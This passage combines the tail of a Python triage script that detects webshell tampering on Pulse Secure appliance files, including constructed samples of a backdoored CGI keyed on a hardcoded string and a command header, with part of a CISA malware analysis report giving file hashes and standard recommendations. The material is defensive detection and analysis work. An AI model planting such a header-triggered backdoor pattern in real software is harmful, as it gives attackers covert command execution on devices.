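        if hashlib.sha256(files[path]).hexdigest() != digest:
            findings.append("%s: content does not match manifest hash" % path)
        elif check_cgi(files[path]):
            findings.append("%s: manifest hash blesses a file with webshell indicators" % path)
    return findings

def triage(files, manifest):
    """Run every check over a {path: bytes} mapping; returns {path: [findings]}."""
    checks = {
        "/bin/umount": check_umount,
        "/home/lib/libdsplibs.so": check_libdsp,
        "/home/bin/check_integrity.sh": check_integrity_script,
        "/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi": check_cgi,
        "/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi": check_cgi,
    }
    report = {p: fn(files[p]) for p, fn in checks.items() if p in files}
    report["manifest"] = check_manifest(manifest, files)
    return {p: f for p, f in report.items() if f}

# Constructed samples mimicking a compromised device (not real file contents).
CGI_PATH = "/home/webserver/htdocs/dana-na/auth/sdp_mobile_login.cgi"
PATCHED_CGI = (b"use DSSessionParams;\nuse Crypt::RC4;\nsub main {\n"
               b"  if ($x_key eq \"zzdibweoQxffnDEi2UKacJlEekplJ7uwrt\") {\n"
               b"    my $x_cmd = $ENV{'HTTP_X_CMD'};\n  }\n}\n")
SAMPLE_FILES = {
    "/bin/umount": b" \n##sstart\n#!/bin/bash\nnormal_um()\n{\n}\n##eend\n#" + ELF_MAGIC + b"\x02\x01",
    "/home/lib/libdsplibs.so": ELF_MAGIC + b"\x00#orceCommand\x00",
    "/home/bin/check_integrity.sh": b"#!/bin/bash\nlocal line c file sha m\nexit 1\n",
    CGI_PATH: PATCHED_CGI,
}
# The manifest already carries the hash of the modified CGI, as patch_manifest leaves it.
SAMPLE_MANIFEST = ("%s %s b\n" % (CGI_PATH, hashlib.sha256(PATCHED_CGI).hexdigest())).encode()
```

Because patch_manifest updates the manifest hash to match the modified CGI, a plain hash-versus-manifest comparison passes on a compromised device; the content checks are what surface the tampering, and a known-good firmware image remains the authoritative reference.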

ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17

Details
Name licenseserverproto.cgi
Size 1967 bytes
Type Perl script text executable
MD5 e65007255aedda92fdfc7da83463996c
SHA1 c8fd93457ab43ac6530d2a964eafe3ad918f864c
SHA256 ea1574595f87171c26f483df77dec52b0c5c73dd37f4dd554944cd6a8b484d17
SHA512 cb5c98ce12967f367f3fa8a820d72c85ebf183cd9aca77d8ff00d1dd847e50fdcfd1a1d819cb07ca9374f8f455838b20f0592a47789345b458270fd5ccc7358f
ssdeep 48:E1LYmeAJAZo1BuswT4o7oo7vpBBBQWBZ7zSH72BZ7TtH7CN4/to7jH7XH76bejBM:EJYkJAZfv/wO27YJ
Entropy 5.078353
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

Upon execution, this Perl script creates a table with two columns (msg_body, msg_length) and the first record for that table. The first record's msg_body is the standard input stream and its msg_length is the length of that stream.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

Initial Version: August 24, 2021

This product is provided subject to this Notification and this Privacy & Use policy.
